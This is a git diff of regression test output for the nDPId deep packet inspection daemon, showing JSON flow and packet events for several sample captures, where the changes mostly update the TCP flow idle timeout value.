+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1536718206640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718206640,"pkt":"AJD7JidrGLQwJjRACABFAAAoMLgAAP8GYcTAqPIPI65S7fd4K1cJMSXi5vF78lAQEgC\/uQAAAAAAAAAA"} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718206572,"flow_last_seen":1536718208745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718208745,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":858,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718209313,"flow_last_seen":1536718209313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718209313,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":858,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1536718209313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718209313,"pkt":"AJD7JidrGLQwJjRACABFAAAsMMIAAP8GGdvAqPIPI7yauvd5K1cJPKL3AAAAAGACEgBHJwAAAgQEgAAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1536718209383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718209383,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93le92HNCTyi+GASbvAoVQAAAgQFjA=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1536718209385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718209385,"pkt":"AJD7JidrGLQwJjRACABFAAAoMMQAAP8GGd3AqPIPI7yauvd5K1cJPKL4XvdhzlAQEgCc2gAAAAAAAAAA"} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718209313,"flow_last_seen":1536718211481,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718211481,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1536718052990,"flow_last_seen":1536718206634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536718202984,"flow_last_seen":1536718206546,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":9459,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536718209313,"flow_last_seen":1536718211968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2258,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":896,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536718392405,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00565{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":900,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":900,"packets-processed":713,"total-skipped-flows":0,"total-l4-data-len":75380,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":17,"total-detection-updates":4,"total-updates":0,"current-active-flows":1,"total-active-flows":17,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":116,"global_ts_msec":1536718512170} 00565{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":950,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":950,"packets-processed":743,"total-skipped-flows":0,"total-l4-data-len":75380,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":17,"total-detection-updates":4,"total-updates":0,"current-active-flows":1,"total-active-flows":17,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":117,"global_ts_msec":1536719113902} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1000,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":1000,"packets-processed":773,"total-skipped-flows":0,"total-l4-data-len":75380,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":17,"total-detection-updates":4,"total-updates":0,"current-active-flows":1,"total-active-flows":17,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":118,"global_ts_msec":1536719715232} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1536718206572,"flow_last_seen":1536719715232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536719715232,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1536718206572,"flow_last_seen":1536719715232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536719715232,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1000,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":1000,"packets-processed":774,"total-skipped-flows":0,"total-l4-data-len":75380,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":17,"total-detection-updates":4,"total-updates":0,"current-active-flows":0,"total-active-flows":17,"total-idle-flows":17,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":120,"global_ts_msec":1536719715232} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1000/774 diff --git a/test/results/netbios.pcap.out b/test/results/netbios.pcap.out index 3a2774b0e..f4a349feb 100644 --- a/test/results/netbios.pcap.out +++ b/test/results/netbios.pcap.out @@ -13,9 +13,9 @@ 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772214344,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00713{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1447772214344,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1447772214344,"pkt":"\/\/\/\/\/\/\/\/ADBIsLGUCABFAADlUKwAAIARylQKAAUJCgAF\/wCKAIoA0VBGEQ7C9AoABQkAigC7AAAgRU9GR0ZDREpDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEZHRUpFSEVKRU1FQkVPRkVGUEVIRkNFUEZGRkFDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQCA\/AoATlZSOQAAAAAAAAAAAAAAAAYBBxABAA8BVaoA"} 00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772214344,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1447772216537,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1447772216537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":1447772216537,"pkt":"ABj+bLz3ABzEEHkPCABFAAApQatAAIAGnIkKAAQYCgAEgwCLBXatXRk68Re6KFAQ96kjtgAAAAAAAAAA"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1447772216537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1447772216537,"pkt":"ABzEEHkPABj+bLz3CABFAAAoY6dAAIAGeo4KAASDCgAEGAV2AIvxF7oorV0ZO1AQ+ycgOAAAAAAAAAAA"} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7560000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1447772216537,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1447772216537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":1447772216537,"pkt":"ABj+bLz3ABzEEHkPCABFAAApQatAAIAGnIkKAAQYCgAEgwCLBXatXRk68Re6KFAQ96kjtgAAAAAAAAAA"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1447772216537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1447772216537,"pkt":"ABzEEHkPABj+bLz3CABFAAAoY6dAAIAGeo4KAASDCgAEGAV2AIvxF7oorV0ZO1AQ+ycgOAAAAAAAAAAA"} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772221776,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1447772221776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772221776,"pkt":"ABzEEHkPACFislxDCABFAABOBFAAAH8RHeEKAAFXCgAEGOHsAIkAOqS0IKgAAAABAAAAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAE="} 00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772221776,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} @@ -68,8 +68,8 @@ 00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772251795,"flow_last_seen":1447772251795,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57921,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","packets-captured":260,"packets-processed":260,"total-skipped-flows":0,"total-l4-data-len":13727,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":14,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":15,"total-idle-flows":15,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":73,"global_ts_msec":1447772269972} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 260/260 diff --git a/test/results/netflix.pcap.out b/test/results/netflix.pcap.out index 403bcca00..27cfa7bee 100644 --- a/test/results/netflix.pcap.out +++ b/test/results/netflix.pcap.out @@ -1,7 +1,7 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"netflix.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"netflix.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1484319030789} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319030789,"flow_last_seen":1484319030789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1484319030789,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.24.87.6","src_port":52929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1484319030789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319030789,"pkt":"gCqoTGHM5JjWH70UCABFAAA0e0NAAEAGcrPAqAEHNBhXBs7BAbvkIOdkTYzTZoAREADl8AAAAQEICh9kr+C2r\/ET"} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319030789,"flow_last_seen":1484319030789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1484319030789,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.24.87.6","src_port":52929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1484319030789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319030789,"pkt":"gCqoTGHM5JjWH70UCABFAAA0e0NAAEAGcrPAqAEHNBhXBs7BAbvkIOdkTYzTZoAREADl8AAAAQEICh9kr+C2r\/ET"} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032865,"flow_last_seen":1484319032865,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319032865,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1484319032865,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1484319032865,"pkt":"gCqoTGHM5JjWH70UCABFAABCVrgAAEARoJrAqAEHwKgBAclXADUALqX1KVYBAAABAAAAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAABAAE="} 